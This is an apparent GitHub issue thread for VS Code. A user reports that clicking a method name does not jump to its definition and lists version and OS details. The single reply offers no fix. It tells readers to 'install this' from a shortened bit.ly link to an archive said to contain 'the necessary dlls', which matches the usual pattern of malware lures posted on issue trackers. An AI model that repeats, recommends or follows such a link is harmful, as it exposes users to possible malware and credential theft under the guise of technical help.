### ISSUE TITLE
Not able to navigate between methods

### ISSUE THREAD

**Issue by sravikumar99** [microsoft/vscode#229039]
Type: <b>Bug</b>

Not able to navigate to particular method if we click the method name.

VS Code version: Code 1.89.0 (b58957e67ee1e712cebf466b995adf4c5307b2bd, 2024-05-01T02:09:22.859Z)
OS version: Windows_NT x64 10.0.22631
Modes:

**Comment by albpedmul** [comment]
install this//bit.ly/3XQLHlHI put the necessary dlls in the archive
